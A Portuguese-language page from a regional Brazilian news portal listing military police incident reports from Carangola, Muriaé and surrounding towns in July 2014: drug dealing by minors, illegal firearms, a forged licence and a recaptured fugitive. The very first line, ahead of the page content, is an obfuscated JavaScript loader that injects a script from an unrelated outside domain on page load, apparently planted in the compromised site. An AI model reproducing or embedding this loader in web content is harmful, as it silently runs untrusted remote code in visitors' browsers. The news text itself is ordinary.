;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais em destaque-Carangola e Região - 07/07/2014. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais em destaque-Carangola e Região – 07/07/2014.

pmbn

OCORRÊNCIAS DE DESTAQUE MURIAÉ – 07/07/2014

                         75ª CIA PM- CARANGOLA-MG

PM APREENDE MENORES POR TRÁFICO DE DROGAS EM CARANGOLA

            Em 04.07.2014, por volta das 21h10min., na Travessa Manoel Cheim, Bairro Santo Onofre, militares no local observaram a chegada e saída de indivíduos conhecidos no meio policial como usuários de drogas, sendo flagrado o momento em que S.F.S, de 38 anos, chegou na porta da casa e fez contato com L.L.B., 16 anos, pedindo por “pedra”, sendo entregue por este. Diante da constatação de tráfico de drogas, a primeira autora foi abordada e recolhido em seu poder 01 pedra de “crack”. Que R.S.S, 17 anos, e L.C.F.A., de 17 anos, agiam como “olheiros”, avisando o segundo autor sobre a chegada da viatura policial. Diante do exposto foi dada voz de apreensão aos menores. A primeira autora e os menores infratores, foram encaminhados à Delegacia de Polícia Judiciária.

PM PRENDE POR PORTE ILEGAL DE ARMA DE FOGO EM DIVINO

             Em 06.07.2014, por volta das 3h10min., na Rua Guthemberg de Souza Filho, Bairro Givisiez, durante policiamento no parque de exposições, militares avistaram W.N.N., de 19 anos, momento em que tentou evadir, sendo alcançado e encontrado em sua cintura 01 revólver Cal.38, e 03 munições intactas. Diante dos fatos foi dado voz de prisão ao autor e conduzido à Delegacia de Polícia.

 

PM PRENDE POR PORTE ILEGAL DE ARMA DE FOGO EM DIVINO

            Em 06.07.20414, por volta das 00h05min., na Rua Guthemberg de Souza Filho, Bairro Giviez, durante policiamento no parque de exposições, militares localizaram na cintura do autor E.C.D., de 19 anos, 01 garrucha cal.38, sem marca, carregada com 02 munições intactas. Diante dos fatos foi dado voz de prisão ao autor e conduzido à Delegacia de Polícia.

 

                        76ª CIA PM – MURIAÉ

 

PM PRENDE POR PORTE ILGEAL DE ARMA DE FOGO EM MURIAÉ

            Em 04.07.2014, por volta das 16h50min., na Rua Cândida Guedes Pereira, Bairro São Pedro, Polícia Militar e Policia Civil em continuidade ao rastreamento, obtiveram informações do local onde se encontravam os autores, J.A.B., de 18 anos, P.S.S., de 17 anos e E.S.G., de 17 anos. E de posse de Mandado de Busca e Apreensão cercaram o local e encontraram os autores, efetuando suas prisões, realizando ainda a prisão de R.S.L., de 30 anos, proprietário da residência onde os indivíduos estavam homiziados. Foi apreendido na residência uma porção de maconha, um revólver cal .38 oxidado, municiado com 06 cartuchos intactos, 01 munição do mesmo calibre, R$ 300,00 e três celulares. Os autores foram encaminhados à Delegacia de Polícia.

PM PRENDE POR USO DE DOCUMENTO FALSO EM MURIAÉ

 

Em 05.07.2014, por volta das 1h30min., na Rua Lacir Goulart da Silva, Bairro Coronel Izalino, militares abordaram o veículo FIAT/BRAVA, cor preta, e ao solicitar os documentos de porte obrigatório o condutor apresentou a CNH com o nome de A.S.N Em consulta ao sistema informatizado foi constatado que o condutor se trata de A.F.S., de 46 anos, e consta em seu desfavor dois mandados de prisão, sendo um da comarca de CACHOEIRA DO ITAPEMIRIM-ES e outro da comarca de VISCONDE DO RIO BRANCO-MG. O autor informou que comprou a CNH no estado de São Paulo e estava utilizando-a para não ser reconhecido devido ser sabedor dos mandados de prisão em seu desfavor. O veículo foi removido ao pátio credenciado, e dado voz de prisão ao autor, que foi conduzido à Delegacia de Polícia.

 

PM PRENDE POR CRIME DE DESOBEDIÊNCIA EM MURIAÉ

 

Em 04.07.2014, por volta das 22h30min., na Rua Júlio Brandão, na Barra, durante policiamento onde estava ocorrendo comemoração pós jogo do Brasil, o autor D.S.T., de 22 anos, foi visto em atitude suspeita, e dado ordem para que ficasse em posição de busca, desobedeceu, sendo necessário contê-lo, tendo em vista que este estava agressivo e utilizando palavras de baixo calão em desfavor do 2º Ten. PM Antônio Carlos Torres. Durante busca pessoal foi encontrado em poder do autor um frasco com uma substância semelhante a “loló”. Foi dado voz de prisão ao autor e conduzido à Delegacia de Polícia.

 

PM RECAPTURA FORAGIDO DA JUSTIÇA EM PATROCÍNIO DO MURIAÉ

 

Em 04.07.2014, por volta das 15h30min., na Fazenda Palmeiras, militares compareceram no MERCADO FRANKLIN, onde o SD PM Josiel Fernando Mendes Souza, relatou que o foragido da justiça A.M.S., de 33 anos, após receber ordem para aguardar a viatura policial adentrou no veículo FIAT/PALIO e empreendeu fuga sentido estrada que dá acesso ao município de Barão do Monte Alto, parando em uma propriedade rural. Sendo abordado e localizado 1278 mídias de CD/DVD pirata no interior do veículo Diante o exposto, foi dada voz de prisão ao autor e encaminhado à Delegacia de Polícia. O veículo utilizado na fuga foi apreendido.

PM CUMPRE MANDADO DE PRISÃO EM MIRADOURO

Em 04.07.2014, por volta das 21h40min., na Rua Tenente Pereira do Valle, no Centro, militares avistaram W.O.S., de 30 anos, sendo esse conhecido no meio policial por possuir em seu desfavor mandado de prisão em aberto. E lograram êxito em abrodá-lo sendo preso e conduzido à elegacia de Polícia.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM

RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA

MURIAÉ / MG

TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.